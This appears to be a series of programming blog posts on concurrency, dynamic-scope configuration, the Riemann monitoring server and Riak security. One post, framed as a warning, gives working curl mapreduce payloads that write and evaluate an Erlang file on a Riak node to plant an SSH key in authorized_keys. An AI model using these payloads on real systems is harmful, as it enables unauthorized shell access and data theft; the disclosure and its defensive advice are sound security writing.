It's harder to interpret strace here because the JVM startup involves a fair number of syscalls. Subtracting the cost to run the program with 0 iterations, we can obtain the marginal cost of each message: roughly 1 futex per 24,000 ops. I suspect the futex calls here are related to the fact that the main thread and most of the clojure future pool are hanging around doing nothing. The work itself is basically free of kernel overhead.

TL;DR: node.js IPC is not a replacement for a real parallel VM. It allows you to solve a particular class of parallel problems (namely, those which require relatively infrequent communication) on multiple cores, but shared state is basically impossible and message passing is slow. It's a suitable tool for problems which are largely independent and where you can defer the problem of shared state to some other component, e.g. a database. Node is great for stateless web heads, but is in no way a high-performance parallel environment.

As KirinDave notes, different languages afford different types of concurrency strategies–and some offer a more powerful selection than others. Pick the language and libraries which match your problem best.

This is a response to a Hacker News thread asking about concurrency vs parallelism.

Concurrency is more than decomposition, and more subtle than “different pieces running simultaneously.” It's actually about causality.

Two operations are concurrent if they have no causal dependency between them.

That's it, really. f(a) and g(b) are concurrent so long as a does not depend on g and b does not depend on f. If you've seen special relativity before, think of “concurrency” as meaning “spacelike”–events which can share no information with each other save a common past.

The concurrency invariant allows a compiler/interpreter/cpu/etc to make certain transformations of a program. For instance, it can take code like

x = f(a)
y = g(b)

and generate

y = g(b)
x = f(a)

… perhaps because b becomes available before a does. Both programs will produce identical functional results. Side effects like IO and queue operations could strictly speaking be said to violate concurrency, but in practice these kinds of reorderings are considered to be acceptable. Some compilers can use concurrency invariants to parallelize operations on a single chip by taking advantage of, say, SIMD instructions or vector operations:

PIPELINE1    PIPELINE2
x = f(a)     y = g(b)

Or more often, vectorized variants of pure functions

[x1, x2, x3, x4] = [f(a1), f(a2), f(a3), f(a4)]

where f could be something like “multiply by 2”.

Concurrency allows for cooperative-multitasking optimizations. Unix processes are typically concurrent with each other, allowing the kernel to schedule them freely on the CPU. It also allows thread, CPU, and machine-level parallelism: executing non-dependent instructions in multiple places at the same wall-clock time.

CPU1         CPU2
x = f(a)     y = g(b)

Languages provide a range of constructs for implicit and explicit concurrency (with the aim of parallelism), ranging from compiler optimizations that turn for loops into vector instructions, push matrix operations onto the GPU and so on; to things like Thread.new, Erlang processes, coroutines, futures, agents, actors, distributed mapreduce, etc. Many times the language and kernel cooperate to give you different kinds of parallelism for the same logical concurrency: say, executing four threads out of 16 simultaneously because that's how many CPUs you have.

What does this mean in practice? It means that the fewer causal dependencies between parts of your program, the more freely you, the library, the language, and the CPU can rearrange instructions to improve throughput, latency, etc. If you build your program out of small components that have well-described inputs and outputs, control the use of mutable shared variables, and use the right synchronization primitives for the job (shared memory, compare-and-set, concurrent collections, message queues, STM, etc.), your code can go faster.
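As a minimal illustration of that freedom (hypothetical pure functions f and g, with Ruby threads standing in for any parallel substrate): because f(a) and g(b) share no causal dependency, they may run in either order, or at the same time, and the result is the same.

```ruby
# f and g are causally independent: neither reads the other's output.
f = ->(a) { a * 2 } # hypothetical pure functions
g = ->(b) { b + 1 }

# Run them in parallel; the joins impose the only ordering required.
t1 = Thread.new { f.call(21) }
t2 = Thread.new { g.call(41) }

x = t1.value # => 42
y = t2.value # => 42
# x and y are the same regardless of which thread ran first.
```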

Most applications have configuration: how to open a connection to the database, what file to log to, the locations of key data files, etc.

Configuration is hard to express correctly. It’s dynamic because you don’t know the configuration at compile time–instead it comes from a file, the network, command arguments, etc. Config is almost always implicit, because it affects your functions without being passed in as an explicit parameter. Most languages address this in two ways:

Globals

Global variables are accessible in every scope, so they make great implicit parameters for functions.

module App
  API_SERVER = "api3"
end

def save(record)
  http_put(App::API_SERVER, record)
end

Classes are often global, so you can also attach config to that class’s eigenclass, singleton object, or what have you:

require 'ostruct'

class App
  def self.config
    @config ||= OpenStruct.new
  end
end

App.config.api_server = "api3"
App.config.api_server # => "api3"

Erlang apps often handle config with a globally-named module:

{ok, Server} = app_config:get(api_server),

The global variable model is concise and simple; it’s what you should reach for right away. Every thread sees the same values. In fact, all code everywhere sees the same values. Yet there are shortcomings: what if you’re writing a library? What about tests, where you might call the same function with several different configurations? What if you’re running more than one copy of your application concurrently?

Object graph traversal

An advanced OOP programmer may solve the global problem by putting configuration into instances. The application sets up a graph of instances, each with the configuration it needs to do its job.

class App
  def initialize(config)
    @api_client = App::APIClient.new config[:api_server]
    @logger = Logger.new config[:logger]
  end
end

… and so forth. What if the APIClient needs to use the logger? You could keep a pointer to the application around:

class APIClient
  def initialize(app, config)
    @app = app
    @server = config[:server]
  end

  def get
    @app.logger.log "getting"
  end
end

And traverse the graph of objects in your application. This basically amounts to passing a configuration parameter into every constructor, but has the added benefit of letting you look up other objects in the Application: maybe other local services you might need. It’s a good way to let different components work together cleanly without making their dependencies explicit: the Application doesn’t need to know exactly what services an APIClient needs. Hoorah, encapsulation! It’s also thread-safe: you can create as many applications concurrently as you like, and they won’t step on each other.

On the other hand, you do a lot of traversing, and since these are instance variables, there’s no way to refer to them within other functions, like class methods. It’s also more difficult to test, since you have to stand up all the dependencies (mocked or otherwise) in order to create an object.

At this point, someone else reading this article is screaming “dependency injection frameworks” and pulling out XML. But before we pull out DI, let’s back up and think.

Backing up for a second

What we really want from configuration is to take functions like this:

f(config, x) = g(config, x * 2)
g(config, y) = h(config, y + 1)
h(config, z) = config + z

… and express them like this:

f(x) = g(x * 2)
g(y) = h(y + 1)
h(z) = config + z

We want the config variable to become implicit so that f and g are simplified. f and g do depend on config–but config may be irrelevant to their internal definition, and explicitly tracking every parameter dependency in the system can be exhausting. These implicit variables are known as dynamic scope in programming languages: variables which are bound in every function in a call stack, but are not explicit in their signatures. More particularly, we want two properties:

  1. The variable is bound only within and below the binding expression. When control returns from the binding expression, the variable reverts to its previous value.

  2. The variable is bound only for the thread that created it, and threads created from the bound scope; that is to say, two parallel invocations of f() can have different values of config. This lets us run, say, two copies of an application at the same time.
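Ruby has no dynamic scope either, but the first two properties can be sketched with a thread-local that a hypothetical Config.bind helper saves and restores around a block:

```ruby
# A sketch of dynamically-scoped config: a thread-local value, bound
# only for the duration of a block and restored afterwards. The binding
# reverts when the block returns (property 1), and each thread sees its
# own binding (property 2).
module Config
  def self.value
    Thread.current[:config]
  end

  def self.bind(new_value)
    old = Thread.current[:config]
    Thread.current[:config] = new_value
    yield
  ensure
    Thread.current[:config] = old
  end
end

def h(z)
  Config.value + z # config is implicit: not in h's signature
end

Config.bind(100) do
  h(1) # => 101
end
```

One caveat: Ruby's Thread.current locals do not inherit into child threads, so unlike Java's InheritableThreadLocal (discussed below), you would have to copy bindings into any threads you spawn.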

In Scala, one kind of implicit scope is provided by implicit parameters, which allow enclosing scope to carry down (at least) one level, to functions which have arguments of the same name and type, and which are tagged as “implicit”. (Well, at least, I think that’s what they do; A Tour of Scala: Implicit Parameters is beyond my mortal comprehension). Implicit parameters don’t carry across threads, which makes it a little tough to defer operations using, say, futures.

In Java, one might consider an InheritableThreadLocal for the task. That gives us the thread isolation property, provided that one remembers to clean up the thread local appropriately at the end of the binding context. Many Java libraries use this to provide, say, request context in a web app. Scala neatly wraps this construct with DynamicVariable, a mutable, thread-local, thread-inherited object which is bound only while a given closure is running. Since Scala doesn’t actually have dynamic scope, we still need to access the DynamicVariable object statically. No problem: we can bind it to a singleton object, just like the Ruby examples earlier:

class App {
  def start() {
    App.config.withValue(someConfigStructure) {
      httpServer.run()
    }
  }
}

object App {
  val config = new DynamicVariable[MyConfig](null)
}

class HttpServer {
  def run() {
    listen(App.config.value.httpPort)
  }
}

There’s a bit of a wart in that we need to call config.value() in order to get the currently bound value, but the semantics are sound, the code is readable, and there’s no extraneous bookkeeping.

Dynamic scope

In languages that support dynamic scope (Most Lisps, Perl, Haskell (sort of)), we can express this directly:

(ns app.config)
(def ^:dynamic config nil)

(ns app.core)
(defn start []
  (binding [app.config/config some-config-structure]
    (http-server/run)))

(ns app.http-server
  (:use app.config))
(defn run []
  (listen (:http-port config)))

One of the arguments against dynamic scope is that it can lead to name capture: a dynamic binding for “config” could break a function deep in someone else’s code that used that variable name. Clojure uses namespaces to separate vars, neatly allowing us to write either “app.config/config”, or, having included app.config, use the short name “config”. Other code remains unaffected.

Dynamic var bindings in Clojure have a root value (shared between all threads), and an overrideable thread-local value. However, not all Clojure closures close over dynamic vars! New threads do not inherit the dynamic frames of their parents by default: only future, bound-fn, and friends capture their dynamic scope. (Thread. (fn [] …)) will run with fresh (root) dynamic bindings. Use (bound-fn) where you want to preserve the current dynamic bindings between threads, and (fn) where you wish to reset them.

Thread-inheritable dynamic vars in Clojure

Alternatively, we could adopt Scala’s approach: define a new kind of reference, backed by an InheritableThreadLocal:

(defn thread-inheritable
  "Creates a dynamic, thread-local, thread-inheritable object, with
  initial value 'value'. Set with (.set x value), read with (deref x)."
  [value]
  (doto (proxy [InheritableThreadLocal IDeref] []
          (deref [] (.get this)))
    (.set value)))

That proxy expression creates a new InheritableThreadLocal which also implements IDeref, Clojure’s interface for dereferenceable things like vars, refs, atoms, agents, etc. Now we just need a macro to set the local within some scope.

(defn- set-dynamic-thread-vars!
  "Takes a map of vars to values, and assigns each."
  [bindings-map]
  (doseq [[v value] bindings-map]
    (.set v value)))

(defmacro inheritable-binding
  "Creates new bindings for the (already-existing) dynamic
  thread-inherited vars, with the supplied initial values. Executes exprs
  in an implicit do, then re-establishes the bindings that existed
  before. Bindings are made sequentially, like let."
  [bindings & body]
  `(let [inner-bindings# (hash-map ~@bindings)
         outer-bindings# (into {} (for [[k# v#] inner-bindings#]
                                    [k# (deref k#)]))]
     (try
       (set-dynamic-thread-vars! inner-bindings#)
       ~@body
       (finally
         (set-dynamic-thread-vars! outer-bindings#)))))

Now we can define a new var–say config, and rebind it dynamically.

(def config (thread-inheritable :default))

(prn "Initially" @config)

(inheritable-binding [config :inside]
  ; In any functions we call, (deref config) will be :inside.
  (prn "Inside" @config)

  ; We can safely evaluate multiple bindings in parallel. It's the
  ; many-worlds hypothesis in action!
  (inheritable-binding [config :future]
    (future (prn "Future" @config)))

  ; Unlike regular ^:dynamic vars, bindings are inherited in child threads.
  (inheritable-binding [config :thread]
    (.start (Thread. (fn [] (prn "In unbound thread" @config))))))

More realistically, one might write:

(defmacro with-config [m & body]
  `(inheritable-binding [config ~m]
     ~@body))

(defn start-server []
  (listen (:port @config)))

(with-config {:port 2}
  (start-server))

Voilà! Mutable, thread-safe, thread-inherited, implicit variables.

It’s worth noting that these variables are not a part of the dynamic binding, so they won’t be captured by (bound-fn). If you want to pass closures between existing threads, use ^:dynamic and (bound-fn). If you want your bindings to follow thread inheritance, use this bind-dynamic approach.

Closing thoughts

With all this in mind, remember LOGO? That little language has more in common with Lisp than you might think, though that discussion is, shall we say… out of this article’s scope.

TO RUNHTTPSERVER
  LISTEN :PORT
END

TO STARTAPP
  MAKE "PORT 8080
  RUNHTTPSERVER
END

I've been focusing on Riemann client libraries and optimizations recently, both at Boundary and on my own time.

Boundary uses the JVM extensively, and takes advantage of Coda Hale's Metrics. For our applications I've written a Riemann Java UDP and TCP client, which also includes a Metrics reporter. The Metrics reporter (I'll be submitting that to metrics-contrib later) will just send periodic events for each of the metrics in a registry, and optionally some VM statistics as well. It can prefix each service, filter with predicates, and has been reporting for two of our production systems for about a week now.

The Java client has been integrated into Riemann itself, replacing the old Aleph client. It's about on par with the old Aleph client, owing to its use of standard Socket and friends as opposed to Netty. Mårten Gustafson and Edward Ribeiro have been instrumental in getting the Java client up and running, so my sincere thanks go out to both of them.

I also removed the last traces of Aleph from riemann.server, replacing the TCP server with a pure Netty implementation. I also replaced Gloss with Netty-provided length header parsers, which cuts down on copying somewhat. Here's the performance of a single-threaded localhost client which sends an event and receives an OK response:

Aleph Raw Netty
drop tcp events latency.png drop tcp events latency 2.png
drop tcp events throughput.png drop tcp events throughput 2.png

Steady-state throughput with raw Netty is about 2.5 times faster. Median and 95% latency is significantly decreased, though occasional 20ms spikes are still present (I presume due to GC). Please keep in mind these graphs can only be compared with each other; they depend significantly on the hardware and JVM. This also does not represent concurrent performance—I'm trying to optimize the simplest system first before moving up. With that in mind, Riemann's real-world performance with these changes should be “much faster”.

Next up I'll be replacing clojure-protobuf with direct use of the Java protobuf classes; as I'm copying data into a standard Map anyway it should be slightly faster and consolidate codepaths between server and client. I'll also begin type-hinting key sections of the server and message parser to reduce use of reflection.

The initial stable release of Riemann 0.1.0 is available for download. This is the culmination of the 0.0.3 development path and 2 months of production use at Showyou.

Is it production ready? I think so. The fundamental stream operators are in place. A comprehensive test suite checks out. Riemann has never crashed. Its performance characteristics should be suitable for a broad range of scales and applications.

There is a possible memory leak, on the order of 1% per day in our production setup. I can't replicate it under a variety of stress tests. It's not clear to me whether this is legitimate state information (i.e. an increase in tracked data), GC/malloc implementations being greedy, or an actual memory leak. Profiling and understanding this is my top priority for Riemann. If this happens to you, restarting the daemon every few weeks should not be prohibitive; it takes about five seconds to reload. Should you encounter this issue, please drop me a line with your configuration; it may help me identify the cause.

The Riemann talk tonight at Boundary is sold out, but I may deliver another in the next month or so. Thanks for your interest, suggestions, and patches. I hope you enjoy Riemann. :)

When I designed UState, I had a goal of a thousand state transitions per second. I hit about six hundred on my Macbook Pro, and skirted 1000/s on real hardware. Eventmachine is good, but I started to bump up against concurrency limits in MRI's interpreter lock, my ability to generate and exchange SQL with SQLite, and protobuf parse times. So I set out to write a faster server. I chose Clojure for its expressiveness and powerful model of concurrent state–and more importantly, the JVM, which gets me Netty, a mature virtual machine with a decent thread model, and a wealth of fast libraries for parsing, state, and statistics. That project is called Riemann.

Today, I'm pleased to announce that Riemann crossed the 10,000 event/second mark in production. In fact it's skirting 11k in my stress tests. (That final drop in throughput is an artifact of the graph system showing partially-complete data.)

throughput.png

cpu.png

By the way, we push about 200 events/sec through a single Riemann server from all of Showyou's infrastructure. There's a lot of headroom.

I did the dumbest, easiest things possible. No profiling. A heavy abstraction (aleph) on top of netty. I haven't even turned on warn-on-reflection or provided type hints yet. All operations are over synchronous TCP. This benchmark measures Riemann's ability to thread events through a complex set of streams including dozens of (where) filters and updating the index with every received event.

10k.png

I'm in the final stages of packaging Riemann for initial public release this week. Boundary has also kindly volunteered their space for a tech talk on Riemann: Thursday, March 1st, at Boundary's offices, likely at 7 PM. I'll post a Meetup link here and on Twitter shortly.

Microsoft released this little gem today, fixing a bug which allowed remote code execution on all Windows Vista, 7, and Server 2008 versions.

...allow remote code execution if an attacker sends a continuous flow of specially crafted UDP packets to a closed port on a target system.

Meanwhile, in an aging supervillain's cavernous lair...

Major thanks to John Muellerleile (@jrecursive) for his help in crafting this.

Actually, don't expose pretty much any database directly to untrusted connections. You're begging for denial-of-service issues; even if the operations are semantically valid, they're running on a physical substrate with real limits.

Riak, for instance, exposes mapreduce over its HTTP API. Mapreduce is code; code which can have side effects; code which is executed on your cluster. This is an attacker's dream.

For instance, Riak reduce phases are given as a module, function name, and an argument. The reduce is called with a list, which is the output of the map phases it is aggregating. There are a lot of functions in Erlang which look like

module:fun([any, list], any_json_serializable_term).

But first things first. Let's create an object to mapreduce over.

curl -X PUT -H "content-type: text/plain" \
  http://localhost:8098/riak/everything_you_can_run/i_can_run_better \
  --data-binary @-<<EOF
Riak is like the Beatles: listening has side effects.
EOF

Now, we'll perform a mapreduce query over this single object. Riak will execute the map function once and pass the list it returns to the reduce function. The map function, in this case, ignores the input and returns a list of numbers. Erlang also represents strings as lists of numbers. Are you thinking what I'm thinking?

curl -X POST -H "content-type: application/json" \
  http://databevy.com:8098/mapred --data @-<<\EOF
{"inputs": [["everything_you_can_run", "i_can_run_better"]],
 "query": [
  {"map": {
    "language": "javascript",
    "source": "
      function(v) {
        // \"/tmp/evil.erl\"
        return [47,116,109,112,47,101,118,105,108,46,101,114,108];
      }"
  }},
  {"reduce": {
    "language": "erlang",
    "module": "file",
    "function": "write_file",
    "arg": "
      SSHDir = os:getenv(\"HOME\") ++ \"/.ssh/\".\n
      SSH = SSHDir ++ \"authorized_keys\".\n
      filelib:ensure_dir(os:getenv(\"HOME\") ++ \"/.ssh/\").\n
      file:write_file(SSH, <<\"ssh-rsa SOME_PUBLIC_SSH_KEY= Fibonacci\\n\">>).\n
      file:change_mode(SSHDir, 8#700).\n
      file:change_mode(SSH, 8#600).\n
      file:delete(\"/tmp/evil.erl\")."
  }}
 ]}
EOF

See it? Riak takes the lists returned by all the map phases (/tmp/evil.erl), and calls the Erlang function file:write_file("/tmp/evil.erl", Arg). Arg is our payload, passed in the reduce phase's argument. That binary string gets written to disk in /tmp.
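You can check the decoding yourself; in Ruby, for instance, mapping the codepoints the map phase returns back to characters recovers the path:

```ruby
# The "list of numbers" is just ASCII codepoints for a file path.
path = [47, 116, 109, 112, 47, 101, 118, 105, 108, 46, 101, 114, 108]
         .map(&:chr).join
# => "/tmp/evil.erl"
```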

The payload can do anything. It can patch the VM silently to steal or corrupt data. Crash the system. Steal the cookie and give you a remote erlang shell. Make system calls. It can do this across all machines in the cluster. Here, we take advantage of the fact that the riak user usually has a login shell enabled, and add an entry to .ssh/authorized_keys.

Now we can use the same trick with another 2-arity function to eval that payload in the Erlang VM.

curl -X POST -H "content-type: application/json" \
  http://databevy.com:8098/mapred --data @-<<\EOF
{"inputs": [["everything_you_can_run", "i_can_run_better"]],
 "query": [
  {"map": {
    "language": "javascript",
    "source": "
      function(v) {
        return [47,116,109,112,47,101,118,105,108,46,101,114,108];
      }"
  }},
  {"reduce": {
    "language": "erlang",
    "module": "file",
    "function": "path_eval",
    "arg": "/tmp/evil.erl"
  }}
 ]}
EOF

Astute readers may recall path_eval ignores its first argument if the second is a file, making the value of the map phase redundant here.

You can now ssh to riak@some_host using the corresponding private key. The payload /tmp/evil.erl removes itself as soon as it's executed, for good measure.

This technique works reliably on single-node clusters, but could be trivially extended to work on any number of nodes. It also doesn't need to touch the disk; you can abuse the scanner/parser to eval strings directly, though it's a more convoluted road. You might also abuse the JS VM to escape the sandbox without any Erlang at all.

In summary: don't expose a database directly to attackers, unless it's been designed from the ground up to deal with multiple tenants, sandboxing, and resource allocation. These are hard problems to solve in a distributed system; it will be some time before robust solutions are available. Meanwhile, protect your database with a layer which allows only known safe operations, and performs the appropriate rate/payload sanity checking.

As a part of the exciting series of events (long story...) around our riak cluster this week, we switched over to riak-pipe mapreduce. Usually, when a node is down mapreduce times shoot through the roof, which causes slow behavior and even timeouts on the API. Riak-pipe changes that: our API latency for mapreduce-heavy requests like feeds and comments fell from 3-7 seconds to a stable 600ms. Still high, but at least tolerable.

mapred.png

[Update] I should also mention that riak-pipe MR throws about a thousand apparently random, recoverable errors per day. Things like

map_reduce_error

with no explanation in the logs, or

{"lineno":466,"message":"SyntaxError: syntax error","source":"()"}

when the source is definitely not "()". Still haven't figured out why, but it seems vaguely node-dependent.

The riak-users list receives regular questions about how to secure a Riak cluster. This is an overview of the security problem, and some general techniques to approach it.

Theory

You can skip this, but it may be a helpful primer.

Consider an application composed of agents (Alice, Bob) and a datastore (Store). All events in the system can be parameterized by time, position (whether the event took place in Alice, Bob, or Store), and the change in state. Of course, these events do not occur arbitrarily; they are connected by causal links (wires, protocols, code, etc.)

If Alice downloads a piece of information from the Store, the two events E (Store sends information to Alice) and F (Alice receives information from store) are causally connected by the edge EF. The combination of state events with causal connections between them comprises a directed acyclic graph.

A secure system can be characterized as one in which only certain events and edges are allowed. For example, only after a nuclear war can persons on boats fire ze missiles.

A system is secure if all possible events and edges fall within the prescribed set. If you're a weirdo math person you might be getting excited about line graphs and dual spaces and possibly lightcones but... let's bring this back to earth.

Authentication vs Authorization

Authentication is the process of establishing where these events are taking place, in system space. Is the person or agent on the other end of the TCP socket really Alice? Or is it her nefarious twin? Is it the Iranian government?

Authorization is the problem of deciding what edges are allowed. Can Alice download a particular file? Can Bob mark himself as a publisher?

You can usually solve these problems independently of one another.

Asymmetric cryptography combined with PKI allows you to trust big entities, like banks with SSL certificates. Usernames with expensively hashed, salted passwords can verify the repeated identity of a user to a low degree of trust. OAuth providers (like Facebook and Twitter) and OpenID also address web authentication. You can combine these methods with stronger systems, like RSA secure tokens, challenge-response over a second channel (like texting a code to the user's cell phone), or one-time passwords for higher guarantees.

Authorization tends to be expressed (more or less formally) in code. Sometimes it's called a policy engine. It includes rules saying things like "Anybody can download public files", "a given user can read their own messages", and "only sysadmins can access debugging information".
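Rules like these are often just data plus a small interpreter. A toy sketch, where the rule names come from the examples above but the agent/action shapes are invented for illustration:

```ruby
# A toy policy engine: each rule is a named predicate over an agent and
# a requested action; deny unless some rule allows. The rule names and
# the agent/action shapes here are invented for illustration.
Rule = Struct.new(:name, :test)

RULES = [
  Rule.new("Anybody can download public files",
           ->(agent, action) { action[:op] == :download && action[:public] }),
  Rule.new("A given user can read their own messages",
           ->(agent, action) { action[:op] == :read_message &&
                               action[:owner] == agent[:id] }),
  Rule.new("Only sysadmins can access debugging information",
           ->(agent, action) { action[:op] == :debug && agent[:role] == :sysadmin })
]

def allowed?(agent, action)
  RULES.any? { |rule| rule.test.call(agent, action) }
end

alice = { id: 1, role: :user }
allowed?(alice, op: :download, public: true)  # => true
allowed?(alice, op: :read_message, owner: 2)  # => false: not her messages
```

Note the deny-by-default shape: if no rule explicitly allows the edge, it doesn't happen.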

Strategies

There are a couple of common ways that security can fail. Sometimes the system, as designed, allows insecure operations. Perhaps a check for user identity is skipped when accessing a certain type of record, letting users view each other's paychecks. Other times the abstraction fails; the SSL channel you presumed to be reliable was tapped, allowing information to flow to an eavesdropper, or the language runtime allows payloads from the network to be executed as code. Thus, even if your model (for instance, application code) is provably correct, it may not be fully secure.

As with all abstractions on unreliable substrates, any guarantees you can make are probabilistic in nature. Your job is to provide reasonable guarantees without overwhelming cost (in money, time, or complexity). And these problems are hard.

There are some overall strategies you can use to mitigate these risks. One of them is known as defense in depth. You use overlapping systems which prevent insecure things from happening at more than one layer. A firewall prevents network packets from hitting an internal system, but it's reinforced by an SSL certificate validation that verifies the identity of connections at the transport layer.

You can also simplify building secure systems by choosing to whitelist approved actions, as opposed to blacklisting bad ones. Instead of selecting evil events and causal links (like Alice stealing sensitive data), you enumerate the (typically much smaller) set of correct events and edges, deny all actions, then design your system to explicitly allow the good ones.

Re-use existing primitives. Standard cryptosystems and protocols exist for preventing messages from being intercepted, validating the identity of another party, verifying that a message has not been tampered with or corrupted, and exchanging sensitive information. A lot of hard work went into designing these systems; please use them.

Create layers. Your system will frequently mediate between an internal high-trust subsystem (like a database) and an untrusted set of events (e.g. the internet). Between them you can introduce a variety of layers, each of which can make stricter guarantees about the safety of the edges between events. In the case of a web service:

  1. TCP/IP can make a reasonable guarantee that a stream is not corrupted.
  2. The SSL terminator can guarantee (to a good degree) that the stream of bytes you've received has not been intercepted or tampered with.
  3. The HTTP stack on top of it can validate that the stream represents a valid HTTP request.
  4. Your validation layer can verify that the parameters involved are of the correct type and size.
  5. An authentication layer can prove that the originating request came from a certain agent.
  6. An authorization layer can check that the operation requested by that person is allowed.
  7. An application layer can validate that the request is semantically valid--that it doesn't write a check for a negative amount, or overflow an internal buffer.
  8. The operation begins.
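One way to picture this stack is as nested wrappers, each refusing to pass a request inward unless its own guarantee holds. A minimal Rack-style sketch; the two checks shown are stand-ins for real validation and authorization logic:

```ruby
# Each layer wraps the next, refusing to pass a request inward unless
# its own guarantee holds. The checks below are stand-ins for real
# validation and authorization logic.
class Layer
  def initialize(app, &check)
    @app, @check = app, check
  end

  def call(request)
    raise "rejected by layer" unless @check.call(request)
    @app.call(request)
  end
end

operation  = ->(req) { "stored #{req[:body]}" }
authorized = Layer.new(operation)  { |req| req[:user] == req[:owner] }  # step 6
validated  = Layer.new(authorized) { |req| req[:body].is_a?(String) }   # step 4

validated.call(user: "alice", owner: "alice", body: "hi")  # => "stored hi"
```

Because each layer only speaks to its immediate neighbors, a request that survives to the core has passed every guarantee along the way.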

Minimize trust between discrete systems. Don't relay sensitive information over channels that are insecure. Force other components to perform their own authentication/authorization to obtain sensitive data.

Minimize the surface area for attack. Write less code, and provide fewer ways to interact with the system. The fewer pathways are available, the easier they are to reinforce.

Finally, it's worth writing evil tests to experimentally verify the correctness of your system. Start with the obvious cases and proceed to harder ones. As the complexity grows, probabilistic methods like Quickcheck or fuzz testing can be useful.
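For instance, a crude fuzz test might hurl random bytes at a validator and assert that it never crashes and never misbehaves. The validator here is a toy stand-in, invented for illustration:

```ruby
# A crude fuzz test: throw random bytes at a validator and assert that
# it always returns a boolean and never raises. The validator is a toy
# stand-in (usernames: 1-32 word characters).
def valid_username?(s)
  return false unless s.is_a?(String)
  s = s.dup.force_encoding(Encoding::UTF_8)
  return false unless s.valid_encoding?
  !!(s =~ /\A\w{1,32}\z/)
end

srand 42  # reproducible "randomness"
1_000.times do
  bytes = Array.new(rand(0..64)) { rand(256) }.pack("C*")
  result = valid_username?(bytes)
  raise "validator returned non-boolean" unless [true, false].include?(result)
end
```

Real property-based tools generate structured inputs and shrink failing cases for you, but even this blunt approach will find encoding and length bugs that hand-written cases miss.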

Databases

Remember those layers of security? Your datastore resides at the very center of that. In any application which has shared state, your most trusted, validated, safe data is what goes into the persistence layer. The datastore is the most trusted component. A secure system isolates that trusted zone with layers of intermediary security connecting it to the outside world.

Those layers perform the critical task of validating edges between database events (e.g. store Alice's changes to her user record) and the world at large (e.g. Alice submits a user update). If your security model is completely open, you can expose the database directly to the internet. Otherwise, you need code to ensure these actions are OK.

The database can do some computation. It is, after all, software. Therefore it can validate some actions. However, the datastore can only discriminate between actions at the level of its abstraction. That can severely limit its potential.

For instance, all datastores can choose to allow or deny connections. However, only relational stores can allow or deny actions on the basis of the existence of related records, as with foreign key constraints. Only column-oriented stores can validate actions on the basis of columns, and so forth.

Your security model probably has rules like "Only allow HR employees to read other employees' salaries" and "Only let IT remove servers". These constructs, "HR employees", "Salaries", "IT", "remove", and "servers" may not map to the datastore's abstraction. In a key-value store, "remove" can mean "write a copy of a JSON document without a certain entry present". The key-value store is blind to the contents of the value, and hence cannot enforce any security policies which depend on it.
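To make that concrete, here's a sketch of what "remove" looks like from the key-value store's point of view; the store sees only an opaque string, so it can't enforce a rule about salaries:

```ruby
require 'json'

# From the key-value store's perspective, "remove the salary field" is
# really "read an opaque string, write a different opaque string". The
# store never sees the field, so it can't enforce a policy about it.
def remove_field(store, key, field)
  doc = JSON.parse(store[key])      # store is just a key -> string map
  doc.delete(field)
  store[key] = JSON.generate(doc)
end

store = { "employee:7" => JSON.generate("name" => "Alice", "salary" => 90_000) }
remove_field(store, "employee:7", "salary")
store["employee:7"]  # => {"name":"Alice"}
```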

In almost every case, your security model will not be embeddable within the datastore, and the datastore cannot enforce it for you. You will need to apply the security model at least partially at a higher level.

Doing this is easy.

Allow only trusted hosts to initiate connections to the database, using firewall rulesets. Usernames and passwords for database connections typically provide little additional security, as they're stored in dozens of places across the production environment. Relying on these credentials or any authorization policy linked to them (e.g. SQL GRANT) is worthless when you assume your host, or even client software, has been compromised. The attacker will simply read these credentials from disk or off the wire, or exploit active connections in software.

On trusted hosts, between the datastore and the outside world, write the application which enforces your security model. Separate layers into separate processes and separate hosts, where reasonable. Finally, untrusted hosts connect these layers to the internet. You can have as many or as few layers as you like, depending on how strongly you need to guarantee isolation and security.

Putting it all together

Let's sell storage in Riak to people, over the web. We'll present the same API as Riak, over HTTP.

Here's a security model: Only traffic from users with accounts is allowed. Users can only read and write data from their respective buckets, which are transparently assigned on write. Also, users should only be able to issue x requests/second, to prevent them from interfering with other users on the cluster.

We're going to presuppose the existence of an account service (perhaps Riak, mysql, whatever) which stores account information, and a bucket service that registers buckets to users.

  1. Internet. Users connect over HTTPS to an application node.
  2. The HTTPS server's SSL acceptor decrypts the message and ensures transport validity.
  3. The HTTP server validates that the request is in fact valid HTTP.
  4. The authentication layer examines the HTTP AUTH headers for a valid username and password, comparing them to bcrypt-hashed values on the account service.
  5. The rate limiter checks that this user has not made too many requests recently, and updates the request rate in the account service.
  6. The Riak validator checks to make sure that the request is a well-formed request to Riak; that it has the appropriate URL structure, accept header, vclock, etc. It constructs a new HTTP request to forward on to Riak.
  7. The bucket validator checks with the bucket service to see if the bucket to be used is taken. If it is, it verifies that the current authenticated user matches the bucket owner. If it isn't, it registers the bucket.
  8. The application node relays the request over the network to a Riak node.
  9. Riak nodes are allowed by the firewall to talk only to application nodes. The Riak node executes the request and returns a response.
  10. The response is immediately returned to the client.
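As an illustration of step 5, a sliding-window rate limiter might look like this sketch; in production the per-user state would live in the account service, not a local hash:

```ruby
# A toy sliding-window rate limiter, as in step 5: allow at most
# `limit` requests per user per `window` seconds. In production this
# state would live in the account service, not a local hash.
class RateLimiter
  def initialize(limit, window = 1.0)
    @limit, @window = limit, window
    @requests = Hash.new { |h, k| h[k] = [] }
  end

  def allow?(user, now = Time.now.to_f)
    ts = @requests[user]
    ts.reject! { |t| t <= now - @window }  # drop timestamps outside the window
    if ts.size < @limit
      ts << now
      true
    else
      false
    end
  end
end

limiter = RateLimiter.new(2)
limiter.allow?("alice", 0.0)  # => true
limiter.allow?("alice", 0.1)  # => true
limiter.allow?("alice", 0.2)  # => false  (two requests already in window)
limiter.allow?("alice", 1.5)  # => true   (old requests have expired)
```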

Naturally, this only works for certain operations. Mapreduce, for instance, executes code in Riak. Exposing it to the internet is asking for trouble. That's why we need a Riak validation layer to ensure the request is acceptable; it can allow only puts and gets.

Happy hacking

I hope this gives you some idea of how to architect secure applications. Apologies for the shoddy editing--I don't have time for a second pass right now and wanted to get this out the door. Questions and suggestions in the comments, please! :-)

One of the hard-won lessons of the last few weeks has been that inexplicable periodic latency jumps in network services should be met with an investigation into named.

dns_latency.png

